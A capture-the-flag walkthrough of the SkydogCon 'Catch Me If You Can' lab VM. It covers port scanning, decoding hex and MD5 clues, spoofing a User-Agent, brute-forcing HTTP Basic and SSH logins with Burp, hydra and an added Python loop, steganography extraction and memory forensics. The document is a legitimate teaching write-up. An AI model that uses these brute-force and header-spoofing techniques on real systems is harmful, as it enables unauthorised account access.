SkydogCon CTF: catch me if you can Walkthrough

In this post I walk through the SkydogCon CTF: Catch Me If You Can. The VM can be downloaded from here; the author is jamesbower.

attack machine: 192.168.56.101  
target machine: 192.168.56.102  

Use Nmap to check open ports and services. Note the 65531 filtered ports in the output: together with the four listed, that is all 65535, so this was a full -p- scan rather than the default top 1000, which is what turned up the non-standard SSH port:

Nmap scan report for 192.168.56.102  
Host is up (0.00036s latency).  
Not shown: 65531 filtered ports  
PORT      STATE  SERVICE  VERSION  
22/tcp    closed ssh  
80/tcp    open   http     Apache httpd 2.4.18 ((Ubuntu))  
443/tcp   open   ssl/http Apache httpd 2.4.18 ((Ubuntu))  
22222/tcp open   ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)  
MAC Address: 08:00:27:D3:70:74 (Oracle VirtualBox virtual NIC)  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  

Flag 1

Port 22 is closed, but there is a second SSH service on port 22222. Connect to it and see what the banner says:

root@evilc:/home/skydog# ssh root@192.168.56.102 -p 22222  
###############################################################
#                         WARNING                             #
#               FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#       Flag{53c82eba31f6d416f331de9162ebe997}                #
###############################################################
root@192.168.56.102's password:  
Permission denied, please try again.  
root@192.168.56.102's password:  

That gives the first flag straight from the SSH banner. The 32 hex characters inside are an MD5 hash; a reverse lookup turns it into a word:

Flag{53c82eba31f6d416f331de9162ebe997}  # md5 decode encrypt  

Flag 2

Next, port 80. It serves a website with a list of hints, one per flag:

FLAGS

Flag#1 - "Don’t go Home Frank! There’s a Hex on Your House"

Flag#2 - “Obscurity or Security? That is the Question"

Flag#3 - “During his Travels Frank has Been Known to Intercept Traffic"

Flag#4 - “A Good Agent is Hard to Find"

Flag#5 - “The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices"

Flag#6 - “Where in the World is Frank?"

Flag#7 - “Frank Was Caught on Camera Cashing Checks and Yelling - I’m The Fastest Man Alive!"

Flag#8 - “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!"  

I can't find any relation between this flag and the first hint, so maybe this isn't really flag 1.
Check the page source, which contains something interesting:

<!--[if IE 8]> <html lang="en" class="ie8"> <![endif]-->  
<!--[if IE 9]> <html lang="en" class="ie9"> <![endif]-->  
<!--[If IE4]><script src="/oldIE/html5.js"></script><![Make sure to remove this before going to PROD]-->  
<!--[if !IE]><!-->  

That commented-out script tag points at /oldIE/html5.js. Fetching it returns a long hex string, which fits the "Hex on Your House" hint for the first flag. Convert it:

root@evilc:/home/skydog# echo "666c61677b37633031333230373061306566373164353432363633653964633166356465657d" | xxd -r -ps  
flag{7c0132070a0ef71d542663e9dc1f5dee}  

The hash inside reverses to another hint: nmap.
With hindsight, that hint is what leads to the second SSH port (22222 rather than 22) in the Nmap scan, so the two flags were simply found in the wrong order. Either way, the first two flags are done.

Flag 3

The hint says to intercept traffic, so I ran Wireshark hoping the target would send something useful, but it showed nothing.
Port 443 is open, so I looked at the SSL certificate instead (the screenshot is from a Firefox with a Chinese UI; the same fields can be read without a browser with openssl s_client). The certificate contains the third flag:

flag3{f82366a9ddc064585d54e3f78bde3221} # md5 decode personnel  

The hash reverses to personnel, which is the next hint.

Flag 4

I was stuck here for a while. Then I tried personnel as a URL path and got a new page:

root@evilc:/home/skydog# curl 192.168.56.102/personnel  
ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging....  

The hint for flag 4 is "A good agent is hard to find", so the server is probably deciding on the User-Agent header. But which User-Agent? The only lead so far is "FBI Workstation".

Back on the website, the IE4 JavaScript file found earlier has comments that answer this:

/* maindev -  6/7/02 Adding temporary support for IE4 FBI Workstations */
/* newmaindev -  5/22/16 Last maindev was and idoit and IE4 is still Gold image -@Support doug.perterson@fbi.gov */

So the request needs to look like it comes from IE 4.0. I took a matching User-Agent string from here and set it with the Firefox add-on User Agent Switcher. That gets past the check and yields flag 4 plus a clue:

flag{14e10d570047667f904261e6d08f520f}  # md5 decode evidence  
# thus the clue is  
newevidence  

Flag 5

The page lists some names; searching them shows they are characters from the film Catch Me If You Can, but nothing else of interest turned up.
The hint is "The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices".
Trying newevidence as a URL path gives a page protected by HTTP Basic authentication.
Keywords, then: details, dialogue, simple, guessable and personal.
The title of this page is "Welcome Agent Hanratty".
So I collected all of Hanratty's quotes from the film from here and built a username list from the agent's name, Carl Hanratty.
CeWL turned the quotes into a password list. Burp Suite confirms the Basic authentication format, base64(username:password), and I used Burp Intruder to brute-force it.
Cracking the username and password took over 6 hours (Intruder is rate-limited in the free edition; hydra's http-get module against the same URL would finish far faster).
After a BBQ with friends, I had the username and password:

carl.hanratty:Grace  

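The two server-side checks above, the User-Agent gate on /personnel and the Basic-auth prompt on /newevidence, can be reproduced and attacked offline. The following is an added example, not code from the original post or from the CTF author: it runs a small local HTTP server that imitates the observed behaviour (the box's real server-side logic is not shown on the page, and the IE4 User-Agent string, the username list and the tiny password list are assumptions), then shows that the UA check falls to a single header and the Basic realm to a short dictionary loop.

```python
import base64
import itertools
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the target. Only the observed behaviour is
# reproduced: /personnel wants an "IE4 FBI workstation" User-Agent,
# /newevidence wants HTTP Basic credentials carl.hanratty:Grace.
EXPECTED_BASIC = base64.b64encode(b"carl.hanratty:Grace").decode()

class FbiHandler(BaseHTTPRequestHandler):
    def log_message(self, *args):          # keep the demo output quiet
        pass

    def do_GET(self):
        if self.path == "/personnel":
            ua = self.headers.get("User-Agent", "")
            if "MSIE 4" not in ua:         # access control on a client-supplied header
                self._send(403, b"ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation.")
            else:
                self._send(200, b"Welcome Agent Hanratty")
        elif self.path == "/newevidence":
            if self.headers.get("Authorization", "") == "Basic " + EXPECTED_BASIC:
                self._send(200, b"Evidence Summary File")
            else:
                self.send_response(401)
                self.send_header("WWW-Authenticate", 'Basic realm="FBI"')
                self.end_headers()
        else:
            self._send(404, b"")

    def _send(self, code, body):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

def start_server():
    """Start the stand-in server on an ephemeral localhost port."""
    srv = HTTPServer(("127.0.0.1", 0), FbiHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}"

def get_status(url, headers):
    """HTTP status code for url sent with the given request headers."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code

# Assumed IE4 User-Agent; the exact string the post used is not shown.
IE4_UA = "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)"

def basic_header(user, password):
    """Authorization header for HTTP Basic: base64 of user:password (encoding, not encryption)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": "Basic " + token}

def brute_basic(url, users, passwords):
    """Try every user:password pair; return the first one that gets a 200."""
    for user, pw in itertools.product(users, passwords):
        if get_status(url, basic_header(user, pw)) == 200:
            return (user, pw)
    return None

if __name__ == "__main__":
    srv, base = start_server()
    print("default UA ->", get_status(base + "/personnel", {}))
    print("IE4 UA     ->", get_status(base + "/personnel", {"User-Agent": IE4_UA}))
    # Constructed lists: variants of "Carl Hanratty" and a few dialogue words.
    # The real CeWL-generated list is far longer.
    users = ["hanratty", "carl", "carl.hanratty", "chanratty"]
    words = ["Brenda", "Frank", "Grace", "Knock"]
    print("basic auth ->", brute_basic(base + "/newevidence", users, words))
    srv.shutdown()
    srv.server_close()
```

Two points worth keeping in mind: the /personnel check makes an access-control decision on a header the client sets, which is exactly the "obscurity or security" the flag 2 hint mocks, and Basic auth over plain HTTP on port 80 ships base64(user:pass) in the clear, so anyone who can intercept the traffic gets the credentials without any cracking. Against the real box the same loop works with the target URL substituted.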
Logging in gives a new page. Open the Evidence Summary File to get the fifth flag, then reverse the hash:

flag{117c240d49f54096413dd64280399ea9}  # md5 deocde panam  

Flag 6

I didn't know what to do with panam (the airline name) yet, so I noted it and moved on. The hint "Where in the World is Frank?" suggests something hidden on the page, and the "Possible Location" link serves an image.jpg. Download it and check it with binwalk:

root@evilc:/home/skydog# binwalk image.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION  
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01  
2214320       0x21C9B0        MySQL MISAM compressed data file Version 10  

binwalk can't extract anything useful from that. The MISAM hit in the middle of the image data is almost certainly a signature false positive, and steghide hides its payload inside the JPEG's DCT coefficients rather than appending it, so there is nothing to carve. So I tried steghide instead (apt-get install steghide):

root@evilc:/home/skydog# steghide extract -sf image.jpg  
Enter passphrase:  

Try panam as the passphrase, and it works:

root@evilc:/home/skydog# steghide extract -sf image.jpg  
Enter passphrase:  
the file "flag.txt" does already exist. overwrite ? (y/n) y  
wrote extracted data to "flag.txt".  
root@evilc:/home/skydog#  
root@evilc:/home/skydog# cat flag.txt  
flag{d1e5146b171928731385eb7ea38c37b8}  
=ILoveFrance

clue=iheartbrenda  

That's the sixth flag and two more clues.
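On the binwalk result above: a signature hit in the middle of a JPEG's entropy-coded data (the "MySQL MISAM" line) is far more often noise than carveable content, and steghide appends nothing to the file, which is why binwalk had nothing to extract. What is cheap to check, and a common CTF trick, is data appended after the real end-of-image marker. The following is an added example, not part of the original post: a walker over the JPEG marker segments that locates the true EOI (a naive search for FF D9 is fooled by EXIF thumbnails, which carry their own EOI) and returns whatever trails it. The sample JPEG is constructed inline and is not a real image.

```python
# JPEG marker constants (ITU T.81)
EOI, SOS = 0xD9, 0xDA
RST = set(range(0xD0, 0xD8))
NO_LENGTH = RST | {0x01}            # RSTn and TEM markers carry no length field

def jpeg_end_offset(data: bytes) -> int:
    """Walk the marker segments and return the offset just past the real EOI.

    Raises ValueError when the input is not a JPEG or ends without an EOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos:#x}")
        marker = data[pos + 1]
        if marker == 0xFF:              # fill byte before a marker
            pos += 1
            continue
        if marker == EOI:
            return pos + 2
        if marker in NO_LENGTH:
            pos += 2
            continue
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        pos += 2 + length               # skip marker plus length-prefixed payload
        if marker == SOS:
            # Entropy-coded data follows. Inside it, 0xFF is always followed by
            # a stuffed 0x00 or an RSTn; anything else is the next real marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and nxt not in RST:
                    break
                pos += 1
    raise ValueError("no EOI marker found")

def trailing_data(data: bytes) -> bytes:
    """Bytes appended after the JPEG proper (empty for a clean file)."""
    return data[jpeg_end_offset(data):]

def naive_trailing(data: bytes) -> bytes:
    """The shortcut 'search for FF D9': wrong whenever a segment embeds its own EOI."""
    return data[data.find(b"\xff\xd9") + 2:]

def build_sample() -> bytes:
    """Constructed minimal JPEG for the demo: an APP1 segment holding an
    EXIF-style thumbnail with its own SOI/EOI, a small SOS header, a scan that
    contains a stuffed FF 00 and an RST0, the real EOI, then an appended ZIP
    local-file header standing in for hidden data."""
    thumb = b"\xff\xd8\xff\xd9"
    app1_payload = b"Exif\x00\x00" + thumb
    app1 = b"\xff\xe1" + (len(app1_payload) + 2).to_bytes(2, "big") + app1_payload
    sos_hdr = b"\x01\x01\x00\x00\x3f\x00"
    sos = b"\xff\xda" + (len(sos_hdr) + 2).to_bytes(2, "big") + sos_hdr
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"
    return b"\xff\xd8" + app1 + sos + scan + b"\xff\xd9" + b"PK\x03\x04hidden.zip"

if __name__ == "__main__":
    sample = build_sample()
    print("real EOI ends at", hex(jpeg_end_offset(sample)))
    print("trailing data:", trailing_data(sample))
    print("naive FF D9 search would return:", naive_trailing(sample)[:8])
```

When this reports trailing bytes, binwalk -e or dd from that offset recovers them; when it reports none, as for a steghide-carrying JPEG, the payload is inside the image data and you need the embedding tool and its passphrase, which is exactly how the panam clue was used above.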

Flag 7

I wandered around the website and found nothing else, so it seemed time to log in over SSH. That needs a username and password: the clues "ILoveFrance" and "iheartbrenda" look like passwords, but where is the username?
The hint for flag 7 is about the fastest man alive. Googling that turns up two candidates: Usain Bolt and The Flash (Barry Allen).
So I built a username list from those two names and a password list from the two clues, then brute-forced SSH with hydra:

root@evilc:/home/skydog# hydra -L username.lst -P password.lst ssh://192.168.56.102:22222  
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-07-13 17:23:57  
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 18 login tries (l:9/p:2), ~0 tries per task
[DATA] attacking service ssh on port 22222
[22222][ssh] host: 192.168.56.102   login: barryallen   password: iheartbrenda

Log in and get the 7th flag:

root@evilc:/home/skydog# ssh barryallen@192.168.56.102 -p 22222  
###############################################################
#                         WARNING                             #
#               FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#       Flag{53c82eba31f6d416f331de9162ebe997}                #
###############################################################
barryallen@192.168.56.102's password:  
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-83-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

101 packages can be updated.  
0 updates are security updates.


Last login: Thu Jul 13 15:21:14 2017 from 192.168.56.101  
barryallen@skydogconctf2016:~$ id  
uid=1001(barryallen) gid=1001(barryallen) groups=1001(barryallen)  
barryallen@skydogconctf2016:~$ ls  
flag.txt  security-system.data  
barryallen@skydogconctf2016:~$ cat flag.txt  
flag{bd2f6a1d5242c962a05619c56fa47ba6}  

Reverse the hash:

flag{bd2f6a1d5242c962a05619c56fa47ba6}  # md5 decode theflash  

Flag 8

The flag 8 hint gives the keyword memory, and there is a second file in the home directory, security-system.data.
Copy it back to the attack machine. It is a zip file; unzip it and analyse the result with binwalk:

root@evilc:/home/skydog# binwalk security-system.data 

DECIMAL       HEXADECIMAL     DESCRIPTION  
--------------------------------------------------------------------------------
150720        0x24CC0         Microsoft executable, portable (PE)  
656418        0xA0422         Copyright string: "Copyright 1985-1998,Phoenix Technologies Ltd.All rights reserved."  
819330        0xC8082         Copyright string: "Copyright (C) 2003-2014  VMware, Inc."  
819369        0xC80A9         Copyright string: "Copyright (C) 1997-2000  Intel Corporation"  
985388        0xF092C         Copyright string: "Copyright 1985-2001 Phoenix Technologies Ltd."  
996673        0xF3541         Copyright string: "Copyright 2000-2015 VMware, Inc."  
1000211       0xF4313         Copyright string: "Copyright 1985-2001 Phoenix Technologies Ltd."  
5074944       0x4D7000        Microsoft executable, portable (PE)  
5894224       0x59F050        Copyright string: "Copyright (C) Rational Systems, Inc."  
6758664       0x672108        CRC32 polynomial table, little endian  
7143424       0x6D0000        Microsoft executable, portable (PE)  
---------------snip-------------------------------

The Phoenix BIOS and VMware copyright strings mean this is a memory image of a VMware virtual machine. Analyse it with Volatility, following this tutorial:

root@evilc:/home/skydog# volatility imageinfo -f security-system.data  
Volatility Foundation Volatility Framework 2.6  
INFO    : volatility.debug    : Determining profile based on KDBG search...  
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)        
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)                                  
                     AS Layer2 : FileAddressSpace (/home/skydog/security-system.data)            
                      PAE type : PAE            
                           DTB : 0x33e000L      
                          KDBG : 0x80545b60L    
          Number of Processors : 1              
     Image Type (Service Pack) : 3              
                KPCR for CPU 0 : 0xffdff000L    
             KUSER_SHARED_DATA : 0xffdf0000L    
           Image date and time : 2016-10-10 22:00:50 UTC+0000                                    
     Image local date and time : 2016-10-10 18:00:50 -0400

The suggested profile is WinXPSP2x86. Use the filescan plugin to look for interesting files:

root@evilc:/home/skydog# volatility --profile=WinXPSP2x86 -f security-system.data filescan  > filename  
Volatility Foundation Volatility Framework 2.6  
root@evilc:/home/skydog# cat filename | grep flag  
root@evilc:/home/skydog# cat filename | grep .txt  
0x0000000005e612f8      1      0 -W-r-- \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt  
0x000000000629fc08      1      0 R--rw- \Device\HarddiskVolume1\Program Files\VMware\VMware Tools\vmacthlp.txt  
0x00000000062c4620      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\adobephotoshopcs3.txt  
0x00000000062c4be8      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\adobeflashcs3.txt  
0x00000000062e04b0      1      0 R--r-d \Device\HarddiskVolume1\Documents and Settings\test\Recent\code.txt.lnk  
0x00000000063b4428      1      0 R--r-- \Device\HarddiskVolume1\System Volume Information\_restore{FA371F61-4781-4A7F-99F2-B979D68F9988}\drivetable.txt  
0x0000000006503e60      4      2 -W-rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware VGAuth\logfile.txt.0  
0x000000000663d4c0      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\win7gadgets.txt  
0x000000000663d6b8      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\vmwarefilters.txt  
0x000000000663d8b0      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\visualstudio2005.txt  
0x000000000663daa8      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\vistasidebar.txt  
0x000000000663dca0      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\microsoftoffice.txt  
0x000000000663de98      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\googledesktop.txt  
0x000000000663f970      1      0 R--rwd \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\manifest.txt  
0x0000000006640bc8      1      0 R--rwd \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt  

code.txt on the test user's Desktop must be important. I spent a long time trying to recover its contents from the image, but couldn't (I'm not very good at this yet).
So I tried other plugins instead; cmdscan recovers the console command history:

root@evilc:/home/skydog# volatility --profile=WinXPSP2x86 -f security-system.data cmdscan  
Volatility Foundation Volatility Framework 2.6  
**************************************************
CommandProcess: csrss.exe Pid: 560  
CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset  
CommandCount: 2 LastAdded: 1 LastDisplayed: 1  
FirstCommand: 0 CommandCountMax: 50  
ProcessHandle: 0x2d4  
Cmd #0 @ 0x1024400: cd Desktop  
Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d > code.txt  

Bingo! The echo wrote the flag to code.txt as space-separated hex, so the contents were in the command history all along. Convert it:

flag{841dd3db29b0fbbd89c7b5be768cdc81}  # md5 decode "Two little mice"  
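Both hex-encoded flags on this page (the contiguous string from /oldIE/html5.js in Flag 2 and the space-separated echo recovered by cmdscan here) decode the same way, and every "md5 decode" step is really a dictionary lookup, since MD5 cannot be reversed, only guessed. The following added example, not code from the original post, does both: it normalises either hex form, checks the flag{<md5>} shape, and compares candidate words against the hash. The CLUES list is constructed from the words the walkthrough recovered; a real run would use a proper wordlist or an online hash database.

```python
import hashlib
import re

FLAG_RE = re.compile(r"flag\d?\{([0-9a-f]{32})\}", re.IGNORECASE)

def decode_hex_flag(hexdigits: str) -> str:
    """Decode a hex-encoded flag. Accepts the contiguous form (html5.js) and
    the space-separated form (the cmdscan echo). Pass only the digits:
    whitespace is fine, surrounding text such as 'echo' is not."""
    digits = re.sub(r"\s+", "", hexdigits)
    if len(digits) % 2 or not re.fullmatch(r"[0-9a-fA-F]*", digits):
        raise ValueError("input is not an even-length hex string")
    return bytes.fromhex(digits).decode("ascii")

def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()

def crack_flag(flag: str, wordlist):
    """Return the wordlist entry whose MD5 equals the hash inside flag{...},
    or None. This is what every 'md5 decode' step in the walkthrough amounts
    to: the hash is matched against guesses, never inverted."""
    m = FLAG_RE.fullmatch(flag.strip())
    if not m:
        raise ValueError("expected flag{<32 hex chars>}")
    target = m.group(1).lower()
    for word in wordlist:
        if md5_hex(word) == target:
            return word
    return None

# Constructed list of the clue words the walkthrough recovered.
CLUES = ["encrypt", "nmap", "personnel", "evidence", "panam",
         "ILoveFrance", "iheartbrenda", "theflash", "Two little mice"]

if __name__ == "__main__":
    html5_js = "666c61677b37633031333230373061306566373164353432363633653964633166356465657d"
    code_txt = ("66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 "
                "64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d")
    for hexstr in (html5_js, code_txt):
        flag = decode_hex_flag(hexstr)
        print(flag, "->", crack_flag(flag, CLUES))
```

The flag regex accepts the Flag{...} and flag3{...} spellings that appear on this box as well as plain flag{...}; the lookup lower-cases the hash but not the candidate words, because "Two little mice" only matches with its original capitalisation and spaces, which is why the author spelled out the spaces.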

That's all eight flags, but what is "two little mice"?
Googling it leads to Wikiquote: it's a line from Frank Abagnale Sr. in the film:

Two little mice fell in a bucket of cream. The first mouse quickly gave up and drowned. The second mouse, wouldn't quit. He struggled so hard that eventually he churned that cream into butter and crawled out. Gentlemen, as of this moment, I am that second mouse.  

Good one, I'm the second mouse too.
Done. Amazing.